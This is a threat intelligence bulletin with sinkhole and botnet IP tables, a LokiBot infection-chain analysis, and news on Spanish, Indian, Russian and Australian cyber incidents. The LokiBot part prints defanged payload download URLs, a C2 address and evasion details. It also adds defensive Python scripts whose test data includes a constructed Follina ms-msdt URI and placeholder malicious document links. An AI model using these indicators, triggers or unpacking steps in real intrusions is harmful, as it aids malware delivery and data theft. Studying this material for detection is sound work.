Activity Summary - Week Ending on 20 July 2023:

  • Red Sky Alliance identified 2,493 connections from new IPs checking in with our sinkholes
  • Linode[.]com hit 39x
  • 99 ‘new’ botnet hits
  • LokiBot
  • Operation Pousada
  • 2,146 weekly cyber-attacks, on average, per organization in India
  • Armageddon
  • GammaSteel
  • Fortescue Iron Ore Hit

Red Sky Alliance Compromised (C2) IPs

172.232.13.47 was not reported in AbuseIPDB, yet it was found 39 times in Red Sky Alliance's collection of malicious data.
ISP: Linode LLC; Usage Type: Data Center/Web Hosting/Transit; Hostname(s): 172-232-13-47.ip.linodeusercontent.com; Domain Name: linode.com; Country: United States of America; City: Chicago, Illinois
https://www.abuseipdb.com/check/172.232.13.47

IP               Contacts
172.232.13.47    39
143.244.152.103  27
37.46.117.90     5
84.239.14.133    2
95.25.212.19     1

On 19 July 2023, Red Sky Alliance identified 2,493 connections from new unique IP addresses, which are checking in with one of the many Red Sky Alliance sinkholed domains.

Malware Variant   Times Seen
sality            2345
corkow            129
trojan:algureom   29
shiz              8
poweliks          7

Top 5 malware variants by number of contacts. Sality and Corkow have consistently remained the top variants; trojan:algureom follows.

Red Sky Alliance Malware Activity

For a full black list – contact analysts: info@redskyalliance.com

 

Red Sky Alliance Botnet Tracker


On 19 July 2023, analysts identified 99 new IP addresses participating in various botnets (call for the full .csv blacklists; below is only a small sampling of botnet tracker entries). We are currently upgrading this collection.

First Seen            Botnet Attribution      Infected Host's IPv4 Address
2023-07-12T12:11:21   HTTP proxy|port: 3128   5.189.144.84
2023-07-13T04:20:33   HTTP proxy|port: 80     8.219.72.50
2023-07-17T06:20:23   HTTP proxy|port: 80     8.219.117.145
2023-07-13T04:20:25   HTTP proxy|port: 80     8.219.179.34
2023-07-13T06:21:11   HTTP proxy|port: 80     8.219.180.151

Keylogger IOCs available upon request. 

  

MALICIOUS CYBER TRENDS:

LokiBot – Below, Fortinet researchers look into the specifics of the identified documents, examine the payload they delivered, and outline the behavioral patterns exhibited by LokiBot.  This analysis aims to shed light on the intricacies of this threat and increase awareness of its operational methods.

1st Stage:  During May 2023, we obtained two types of Word documents for analysis. The first type featured an external link embedded within an XML file, “word/_rels/document.xml.rels,” while the second type included a VBA script that executed a macro immediately upon opening the document.[1]  Notably, both files contained a strikingly similar bait image, depicted in Figure 1.

Figure 1: The lure image from the Word document

The Word document that targets CVE-2021-40444 contained a “document.xml.rels” file, shown in Figure 2, with an external link that uses MHTML (MIME encapsulation of aggregate HTML documents), a web archive format that combines a website's HTML and its companion resources into a single file.  The link also uses Cuttly, a URL shortener and link management platform, to redirect users to the cloud file-sharing website “GoFile.”  Further analysis revealed that a file named “defrt.html” was downloaded upon accessing the link.  This file exploits the second vulnerability, CVE-2022-30190 (Follina).  The content of this file and the decoded data are displayed in Figure 3.

Upon executing the payload, it initiates the download of an injector file named “oehrjd.exe” from the following URL: http[:]//pcwizard[.]net/yz/ftp/.  Detailed information regarding the execution file can be found in the subsequent section.

Figure 2: The document.xml.rels file contains a malicious external link in an oleObject relationship

Figure 3: Malicious content from “defrt.html” and the decoded data
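The two document-side indicators described above (an external, mhtml: relationship target in word/_rels/document.xml.rels and an HTML stage that invokes the ms-msdt: handler) can be checked statically, without ever opening the file in Word.  The script below is an added example, not Fortinet's tooling or code from the original analysis; the .docx it builds in memory and the HTML snippet it scans are constructed for the demo, and every hostname in them is a placeholder under example.invalid.

```python
"""Static checks for the two document-side indicators in the LokiBot chain.

Added example (not Fortinet's tooling). It inspects a .docx for relationships
whose Target lives outside the package (the mhtml:/oleObject trick) and scans
an HTML stage for the ms-msdt: handler URI, including inside base64 blobs
that a loader might wrap in atob().
"""
import base64
import binascii
import io
import re
import xml.etree.ElementTree as ET   # use defusedxml for hostile input in production
import zipfile

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
RELS_PART = "word/_rels/document.xml.rels"


def external_relationships(docx_bytes: bytes) -> list:
    """Return every Relationship in document.xml.rels with TargetMode="External"."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PART not in zf.namelist():
            return []
        root = ET.fromstring(zf.read(RELS_PART))
    hits = []
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        if rel.get("TargetMode") != "External":
            continue
        target = rel.get("Target", "")
        hits.append({
            "id": rel.get("Id"),
            "type": rel.get("Type", "").rsplit("/", 1)[-1],   # e.g. "oleObject"
            "target": target,
            "mhtml": target.lower().startswith("mhtml:"),
            "ole": rel.get("Type") == OLE_REL,
        })
    return hits


B64_RE = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def has_msdt_handler(html: bytes) -> bool:
    """True if the HTML, or a base64 blob inside it, invokes the ms-msdt: scheme."""
    if b"ms-msdt:" in html.lower():
        return True
    for blob in B64_RE.findall(html):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        if b"ms-msdt:" in decoded.lower():
            return True
    return False


def build_sample_docx(rels_xml: str) -> bytes:
    """Constructed minimal .docx holding only the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr(RELS_PART, rels_xml)
    return buf.getvalue()


# Constructed relationships part; hosts are placeholders, not the real infrastructure.
SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OLE_REL}" TargetMode="External"
      Target="mhtml:https://shortener.example.invalid/x!x-usc:https://share.example.invalid/defrt.html"/>
</Relationships>"""

# Constructed Follina-style stage: the handler URI is hidden in atob(), as often seen in the wild.
_MSDT_URI = b'ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=..."'
SAMPLE_HTML = (b'<html><body><script>window.location.href = atob("'
               + base64.b64encode(_MSDT_URI) + b'");</script></body></html>')


if __name__ == "__main__":
    for hit in external_relationships(build_sample_docx(SAMPLE_RELS)):
        print("external relationship:", hit)
    print("ms-msdt handler present:", has_msdt_handler(SAMPLE_HTML))
```

Run it on a real document by reading the file bytes and calling external_relationships(); an oleObject relationship with an external mhtml: target is the CVE-2021-40444 pattern and is reason enough to quarantine the file before any preview.  has_msdt_handler() is meant for the fetched HTML stage captured by a proxy or sandbox, not for live retrieval of the link.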

The second document was discovered towards the end of May. Upon analyzing the VBA script embedded within the Word document, as illustrated in Figure 4, the code is automatically executed due to its use of the “Auto_Open” and “Document_Open” functions.  Various arrays are decoded within the script and saved to a temporary folder under the name “DD.inf” (Figure 5).  It includes a command to create an “ema.tmp” file to store data after line 29 in the “DD.inf” file.  The data is then encoded using the “ecodehex” function and saved as “des.jpg”.  The script then uses rundll32 to load a DLL file with the function “maintst.”  Finally, it deletes all temporary, JPG, and INF files created throughout this process.

Figure 4: The VBA macro from the Word document

Figure 5: The content of “DD.inf”

The Compromised Website:  As mentioned, the VBA script creates an INF file to load a DLL.  The purpose of this DLL file, named “des.jpg,” is to download an injector from the URL “https[:]//vertebromed[.]md/temp/dhssdf[.]exe” for use in a later stage. It's worth noting that the download link doesn't belong to a typical file-sharing cloud platform or the attacker's command-and-control (C2) server.  Instead, it leverages the website “vertebromed.md,” which has been active since 2018.  The injector file, “dhssdf.exe,” was created on May 29, 2023, as shown in Figure 6.  Additionally, within the same folder, we discovered another MSIL loader named “IMG_3360_103pdf.exe,” created on May 30, 2023.   Although this file isn't directly involved in the Word document attack chain, it also loads LokiBot and connects to the same C2 IP.

Figure 6: Web page and the compromised folder

2nd Stage – Injector:  In this section, we analyze the injector obtained via the Follina (CVE-2022-30190) chain (SHA256: 9eaf7231579ab0cb65794043affb10ae8e4ad8f79ec108b5302da2f363b77c93).  The injector is written in Visual Basic (VB); an overview of its basic information is provided in Figure 7.

Figure 7: Information on the VB injector

Initially, the code extracts individual letters from predetermined strings.  These letters are then combined to form an API string, subsequently mapped to the corresponding functions illustrated in Figure 8.

Figure 8: API functions

The injector uses a hardcoded key to decrypt the payload, as shown in Figure 9; the decryption process is outlined as pseudo-code in Figure 10.  The decrypted data is then decompressed with the “RtlDecompressBufferEx” API using the “COMPRESSION_FORMAT_LZNT1” parameter.  The complete procedure, as Python code, together with part of the resulting payload is shown in Figure 11.

Figure 9: The key and encrypted data

Figure 10: The pseudo-code for decryption

Figure 11: The Python code and the final payload
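The decrypt-then-decompress step can be reproduced outside the sample.  The following is an added example, not the Python from Figure 11 or the injector's own code: it implements LZNT1 decoding as performed by RtlDecompressBufferEx with COMPRESSION_FORMAT_LZNT1.  Because the decryption routine of Figure 10 is not reproduced on this page, a single-byte XOR with a hypothetical key (KEY) stands in for that step so the whole pipeline can be exercised offline; the compressed test vectors are hand-assembled, not data from the sample.

```python
"""LZNT1 decompression, the format RtlDecompressBufferEx(COMPRESSION_FORMAT_LZNT1) consumes.

Added example; not the Python shown in Figure 11 or the injector's code. The
decryption step (Figure 10) is not reproduced on this page, so xor_decrypt()
with the hypothetical KEY stands in for it here.
"""

KEY = 0x5A  # hypothetical placeholder; the sample's real hardcoded key is only shown in Figure 9


def xor_decrypt(data: bytes, key: int = KEY) -> bytes:
    """Stand-in for the injector's decryption routine (assumption, see above)."""
    return bytes(b ^ key for b in data)


def lznt1_decompress(data: bytes) -> bytes:
    """Decode an LZNT1 stream: chunks of up to 4 KiB, each behind a 2-byte header."""
    out = bytearray()
    pos = 0
    while pos + 2 <= len(data):
        header = data[pos] | (data[pos + 1] << 8)
        pos += 2
        if header == 0:                      # optional end-of-stream marker
            break
        size = (header & 0x0FFF) + 1         # compressed bytes that follow the header
        chunk_end = pos + size
        if chunk_end > len(data):
            raise ValueError("truncated LZNT1 chunk")
        if not header & 0x8000:              # bit 15 clear: chunk is stored verbatim
            out += data[pos:chunk_end]
            pos = chunk_end
            continue
        chunk_base = len(out)                # back-references never cross chunk boundaries
        while pos < chunk_end:
            flags = data[pos]                # one flag bit per following token, LSB first
            pos += 1
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not flags & (1 << bit):   # literal byte
                    out.append(data[pos])
                    pos += 1
                    continue
                if pos + 2 > chunk_end:
                    raise ValueError("truncated LZNT1 token")
                token = data[pos] | (data[pos + 1] << 8)
                pos += 2
                # The split of the 16-bit token between displacement (high bits) and
                # length (low bits) widens the displacement as the chunk fills up.
                produced = len(out) - chunk_base - 1
                length_mask, disp_shift = 0x0FFF, 12
                while produced >= 0x10:
                    length_mask >>= 1
                    disp_shift -= 1
                    produced >>= 1
                length = (token & length_mask) + 3
                disp = (token >> disp_shift) + 1
                if disp > len(out) - chunk_base:
                    raise ValueError("LZNT1 back-reference reaches before chunk start")
                for _ in range(length):      # byte-wise so overlapping copies repeat
                    out.append(out[-disp])
    return bytes(out)


def unpack_payload(blob: bytes, key: int = KEY) -> bytes:
    """Decrypt (stand-in) then decompress, mirroring the injector's two steps."""
    return lznt1_decompress(xor_decrypt(blob, key))


# Hand-assembled test vectors (constructed, not data from the sample).
# 0xB008: compressed chunk (bit 15 set), signature 3, 9 bytes follow. Flag byte 0x40
# marks the 7th token as a back-reference: 0x5008 = displacement 6, length 11.
COMPRESSED = bytes.fromhex("08B0" "40" "48656C6C6F20" "0850")   # -> b"Hello Hello Hello"
STORED = bytes.fromhex("0430" "4142434445")                     # 0x3004: stored chunk, 5 bytes -> b"ABCDE"
ENCRYPTED_BLOB = xor_decrypt(COMPRESSED + STORED)               # shape of a packed payload buffer


if __name__ == "__main__":
    print(unpack_payload(ENCRYPTED_BLOB))
```

Feed the buffer from Figure 9, after the sample's real decryption, to lznt1_decompress(); a correctly decoded payload should begin with an MZ header.  The byte-wise back-reference copy is deliberate: LZNT1 allows a displacement shorter than the length, which is how runs are encoded, and a slice copy would silently truncate them.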

The injector incorporates various evasion techniques, including:

  • Checking the “BeingDebugged” flag of PEB (Process Environment Block)
  • Utilizing the “NtGlobalFlag” to determine if the process was created by a debugger
  • Verifying the existence of virtual machine paths, such as “\VMWare” and “\Oracle\virtualbox guest additions”
  • Employing two calls to the “GetTickCount” API and using Sleep() to check if the time has been accelerated
  • Using the “FindWindowW” function to identify the presence of specific debuggers, such as “OllyDbg,” “x64dbg,” “x32dbg,” “WinDbg,” “WinDbgFrameClass,” “ObsidianGUI,” “Soft Ice,” “ImmDbg,” “Zeta Debugger,” and “Rock Debugger”
  • Checking the “ProcessDebugObjectHandle” (0x1E)

After obtaining the payload and verifying the overall environment, the injector utilizes the “VirtualAllocEx” function to allocate memory for the subsequent execution of LokiBot.

Figure 12: Assembly code for allocating memory

3rd Stage – LokiBot:  LokiBot is specifically designed to gather sensitive information from various sources, including web browsers, FTP, email, and numerous software tools installed on the compromised system. Analyzing the C2 traffic to “95[.]164[.]23[.]2/swe/h/pin[.]php” in Figure 13, we determined that the version is 0x0012 and the notable Binary ID is “ckav[.]ru”.  As this version of LokiBot has remained unchanged since March, we will only highlight its major components and features.

Figure 13: C2 traffic capture of LokiBot

First, the MD5 hash derived from the MachineGuid appears at the end of the pcap: “D0BECCE5760947DD9FFD80DB”.  This hash serves as the mutex name, ensuring that multiple instances of LokiBot do not run simultaneously.  Using substrings of the same MD5, the malware creates a folder named “%APPDATA%\Roaming\576094” and uses the “MoveFileExW” API to move its executable into that folder under the name “47DD9F.exe”.  The file is marked hidden by calling “SetFileAttributes” with FILE_ATTRIBUTE_HIDDEN (0x2).  The corresponding registry settings associated with LokiBot are depicted in Figure 14.

Figure 14: Registry settings
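Because the folder and file names are derived from the MachineGuid, a defender can compute the exact paths to look for on a given host instead of searching for generic six-character directories.  The script below is an added example, not LokiBot's or Fortinet's code.  Its slice positions reproduce the tuple quoted above (ID D0BECCE5760947DD9FFD80DB, folder 576094, file 47DD9F.exe) but were inferred from that single example; exactly which string LokiBot hashes (the GUID with or without braces, its case and encoding) is an assumption, as is the directory listing used for the demo.

```python
"""Compute the LokiBot host artifacts that follow from a machine's MachineGuid.

Added example, not LokiBot's or Fortinet's code. ASSUMPTIONS: the ID is the
upper-case MD5 of the MachineGuid string truncated to 24 hex characters, and
the folder/file names are the slices [7:13] and [12:18] of that ID. Both were
inferred from the single tuple quoted in the text and should be confirmed
against a sample before the output is trusted for hunting.
"""
import hashlib
import sys

FILE_ATTRIBUTE_HIDDEN = 0x2   # the attribute LokiBot sets on its dropped copy


def lokibot_id(machine_guid: str) -> str:
    """ASSUMED derivation: MD5(MachineGuid) as upper-case hex, first 24 characters."""
    return hashlib.md5(machine_guid.encode("ascii")).hexdigest().upper()[:24]


def artifacts_from_id(bot_id: str) -> dict:
    """Map the 24-char ID to mutex name, %APPDATA% folder and executable name."""
    folder = bot_id[7:13]     # "576094" for the ID in the text
    stem = bot_id[12:18]      # "47DD9F" for the ID in the text
    return {
        "mutex": bot_id,
        "folder": folder,
        "exe": f"{stem}.exe",
        "path": f"%APPDATA%\\{folder}\\{stem}.exe",
    }


def read_machine_guid() -> str:
    """Read HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid (Windows only)."""
    if sys.platform != "win32":
        raise OSError("MachineGuid lives in the Windows registry")
    import winreg
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Cryptography") as key:
        value, _ = winreg.QueryValueEx(key, "MachineGuid")
    return value


def match_listing(listing: list, expected: dict) -> list:
    """Return entries of a directory listing that end in the expected folder\\exe pair."""
    suffix = f"\\{expected['folder']}\\{expected['exe']}".lower()
    return [p for p in listing if p.lower().endswith(suffix)]


# Constructed listing for the demo; no real host data.
SAMPLE_LISTING = [
    r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs",
    r"C:\Users\victim\AppData\Roaming\576094\47DD9F.exe",
    r"C:\Users\victim\AppData\Roaming\Code\User\settings.json",
]


if __name__ == "__main__":
    expected = artifacts_from_id("D0BECCE5760947DD9FFD80DB")   # value from the C2 capture above
    print(expected)
    print("suspicious entries:", match_listing(SAMPLE_LISTING, expected))
```

The text writes the folder as %APPDATA%\Roaming\576094; since %APPDATA% already expands to ...\AppData\Roaming, the on-disk path is ...\AppData\Roaming\576094\47DD9F.exe, which is what the constructed listing mirrors.  On a Windows host, read_machine_guid() supplies the real value, and os.stat(path).st_file_attributes & FILE_ATTRIBUTE_HIDDEN confirms the hidden flag described above.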

The list of targeted software names is stored in an array, and a partial list is provided in Figure 15.

Figure 15: Partial data of targeted software

Conclusion:  LokiBot is a long-standing and widespread malware family that has been active for many years.  Its functionality has matured over time, making it easy for cybercriminals to use it to steal sensitive data from victims.  The attackers behind LokiBot continually update their initial access methods, allowing their campaigns to find more efficient ways to spread and infect systems.

LokiBot exploits various vulnerabilities and employs VBA macros to launch its attacks. It also leverages a VB injector to employ several techniques to evade detection or analysis.  As a result, it can bypass certain security measures and pose a significant threat to users.  To protect themselves, users should exercise caution when dealing with any Office documents or unknown files, especially those that contain links to external websites. It is essential to be vigilant and avoid clicking on suspicious links or opening attachments from untrusted sources. Additionally, keeping the software and operating systems up to date with the latest security patches can help mitigate the risk of exploitation by malware.

Figure 16: LokiBot attack chain

IOCs

C2:

95[.]164[.]23[.]2

Files:

17d95ec93678b0a73e984354f55312dda9e6ae4b57a54e6d57eb59bcbbe3c382
23982d2d2501cfe1eb931aa83a4d8dfe922bce06e9c327a9936a54a2c6d409ae
9eaf7231579ab0cb65794043affb10ae8e4ad8f79ec108b5302da2f363b77c93
da18e6dcefe5e3dac076517ac2ba3fd449b6a768d9ce120fe5fc8d6050e09c55
2e3e5642106ffbde1596a2335eda84e1c48de0bf4a5872f94ae5ee4f7bffda39
80f4803c1ae286005a64ad790ae2d9f7e8294c6e436b7c686bd91257efbaa1e5
21675edce1fdabfee96407ac2683bcad0064c3117ef14a4333e564be6adf0539
4a23054c2241e20aec97c9b0937a37f63c30e321be01398977e13228fa980f29

GLOBAL TRENDS:

Spain - A man has been arrested in Sevilla on suspicion of buying the personal information and bank details of more than 15,000 Spanish taxpayers, as well as keeping a stash of illegal firearms.  Details of the case, named Operation Pousada, were revealed on 17 July by the Policia Nacional following the suspect's arrest in Sevilla.[2]

National Police officers detained a person on 11 July in Dos Hermanas (Seville) for his alleged participation in the crimes of disclosure of secrets and fraud, both of a continuous nature, and possession of weapons, including the storage of weapons of war and ammunition.  The investigation began in November 2022 when investigators became aware of several cyber-attacks on the computer systems of various public institutions, such as the General Council of the Judiciary (CGPJ) and the State Tax Administration Agency, among others.  Specialist cyber-crime officers from the General Information Police identified one of the persons responsible for the attacks: a young man with a long career in cybercrime, who was arrested on 31 March in Madrid.

This first suspect had developed a platform called ‘Ojo de Horus’ (Eye of Horus), where he illegally gathered citizens' personal data, which was then offered for sale to third parties.  Two months later, after an intense investigation, a second individual was located who, together with the first suspect, had been responsible for illegally obtaining the user credentials used to carry out the cyber-attacks.

Officers discovered that the man illicitly acquired more than 15,000 records containing personal and banking information of Spanish taxpayers.  Using different digital identities in instant messaging applications, the suspect managed a wide network of contacts for financial gain.  One method he employed was to send an SMS to a user, pretending to be a legitimate entity (a social network, bank, or public institution) with the aim of stealing private information or making a financial charge.  When officers raided the man's home, he had a tab open and active in his laptop's browser for a mass SMS-sending platform.  He was also in possession of 24 mobile phones and 114 SIM cards ready for use.

Officers found that the suspect not only had a wide network of criminal contacts in the virtual world but also kept firearms in his home, which further demonstrates his high level of danger and links to common crime.  The firearms found included a submachine gun, a handgun and a shotgun, all with their respective cartridges and ready to be used.  Notably, the automatic weapon, a Scorpion submachine gun, has high firepower and is considered a weapon of war under the current Weapons Regulations.  His lucrative illegal activities were also evidenced by a high standard of living, with a large number of luxury items such as jewelry, gold pendants and watches, as well as high-end vehicles.

It was also discovered that during 2022 he disposed of crypto-assets worth more than 1.2 million euros through eight different bitcoin wallets.  On 13 July, the detainee was brought before the head of Central Court of Instruction number four of the Audiencia Nacional, which ordered his imprisonment.  The operation was conducted with the collaboration of the Provincial Information Brigade of Seville, the National Police Station of Dos Hermanas, the National Cryptologic Centre and the National Intelligence Centre.

India - A single Indian organization suffered 2,146 cyber-attacks per week on average over the last six months, compared to 1,239 attacks per organization globally, according to Check Point’s ‘Threat Intelligence Report 2023.’  According to the report, healthcare (4,839 weekly attacks per organization), followed by education and research (3,532), government/military (3,017), and insurance/legal (2,523), were the most attacked industries in India.  Globally, the second quarter (Q2) of 2023 saw an 8% surge in weekly cyberattacks.  The report noted that the education and research sector experienced the highest number of attacks per week, and that Africa and APAC faced the highest annual increase in weekly attacks per organization.[3]  “While the disruptive impact of the Russo-Ukrainian conflict on the cyber landscape has relatively reduced in recent months, the threat landscape has returned to a state of ‘normality.’ This new normal is characterized by an increase in cyberattacks,” the report mentioned.

Despite the conflict's waning effect on the cyber threat landscape, the persistence of these threats highlights the ongoing need for heightened vigilance and robust cybersecurity measures to counteract the relentless and evolving nature of cyberattacks, it added.  In addition, cybercriminals continue to leverage the latest AI developments by stretching the limits of generative AI chat platforms such as ChatGPT.  In Q2, one out of every 44 organizations worldwide experienced a ransomware attack, a decrease of 9% compared to Q2 2022.  APAC and Europe saw significant year-over-year increases in ransomware attacks per organization, of 29% and 21% respectively, the report said.

Russia - The Moscow-linked hacking group known as Armageddon remains one of the most active and dangerous threat actors targeting Ukraine during its war with Russia, according to recent research.  The group, also known as Gamaredon, mostly conducts cyberespionage operations against Ukrainian security and defense services, but the group has also been linked to at least one destructive cyberattack against an unspecified information infrastructure facility, according to the Ukrainian computer emergency response team (CERT-UA).  According to an analysis from CERT-UA published last week, the group has infected thousands of government computers.  “They are even more active this year than they were last year—both in terms of malware development as well as phishing campaigns,” said a threat intelligence researcher at Slovak cybersecurity company ESET.[4]

The group is “bombarding Ukraine,” said an intelligence analyst at US cybersecurity firm Symantec.  According to him, the group was apparently created solely to carry out attacks on Ukraine.  “That's highly unusual,” he said.  “It may not be the most technically sophisticated group but the combination of focus and energy does make it particularly threatening.”

Tactics and tools:  Armageddon operates from the Russian-annexed Crimean Peninsula and acts on orders from Russia’s Federal Security Service (FSB) in Moscow, according to cybersecurity experts.  Lately, the group has been consistently improving its tactics and rewriting its tools to evade detection, according to CERT-UA.  One of the latest techniques observed by researchers is a USB infection technique: if an infected drive is shared between computers, the threat actor can infect new nodes, according to BlackBerry’s cyber threat intelligence team.  "It is a simple but sometimes effective way of spreading malware to more computers on a network and lengthening their intrusion times,” they said.

To gain initial access to a victim’s system, Armageddon mostly uses phishing emails or text messages sent from previously compromised Telegram, WhatsApp, and Signal accounts, according to CERT-UA.  Once in, the operators typically steal files within 30 to 50 minutes, often using the GammaSteel malware, a custom information-stealer implant that can exfiltrate files with specific extensions, steal user credentials and take screenshots of the victim’s computer.  The attackers can re-infect a computer if at least one malicious file remains on it, CERT-UA said.

Espionage and persistence:  The focus on espionage distinguishes Armageddon from other state-sponsored Russian groups, including Sandworm, which is mostly engaged in cyber sabotage.  But it also makes it harder for researchers to evaluate the impact of Armageddon’s attacks, according to CERT-UA.  “We have been detecting continuous waves of Armageddon campaigns in Ukraine and many attacks have been thwarted,” he said. 

The group mostly uses Telegram to send instructions to compromised devices, receive information from them, and coordinate its actions.  The use of Telegram helps the threat actor “fly under the radar,” since the communication goes to the platform’s own servers, which are legitimate web resources.  “For defenders, it’s generally harder to spot exfiltration and malicious communications,” they added.  Although Gamaredon has been “quite successful” in Ukraine, it still faces challenges, such as moving laterally within infected networks.  Researchers believe the group is trying to make up for its lack of technical skill with persistence in its attacks.  “They tend to only compromise individual computers in targeted organizations, so it’s quite likely they're usually getting fragments rather than the keys to the kingdom,” he said.

Australia - Fortescue, the world’s fourth-largest iron ore exporter, described the attack as “a low impact cyber incident” that occurred on 28 May.  The information disclosed “was not confidential in nature,” the Perth-based company said in an emailed response to inquiries.  “We notified the Australian Cyber Security Centre of the incident, and our internal investigation and remediation actions are now complete,” Fortescue said.  The Australian newspaper reported earlier this week that the Russian ransomware gang Cl0p (also written “Clop”) had claimed via a blog on the dark web that it had stolen customer data from Fortescue in a “financially motivated” attack.  The gang had not released the data and was seeking a ransom from Fortescue, the paper said, without saying when the information was posted on the blog.[5]

Iron ore is the source of primary iron for the world's iron and steel industries.  It is therefore essential for the production of steel, which in turn is essential to maintain a strong industrial base.[6] 

[1] https://www.fortinet.com/blog/threat-research/lokibot-targets-microsoft-office-document-using-vulnerabilities-and-macros?lctg=141970831

[2] https://euroweeklynews.com/2023/07/17/15000-spanish-taxpayers-details-sold-following-cyber-attacks/

[3] https://economictimes.indiatimes.com/tech/technology/over-2000-cyber-attacks-hit-a-single-indian-firm-a-week-on-average-report/articleshow/101829518.cms

[4] https://therecord.media/armageddon-gamaredon-russian-hacking-group-increasingly-targeting-ukraine-government/

[5] https://news.yahoo.com/fortescue-hit-cyber-attack-saw-053934501.html

[6] https://www.usgs.gov/centers/national-minerals-information-center/iron-ore-statistics-and-information
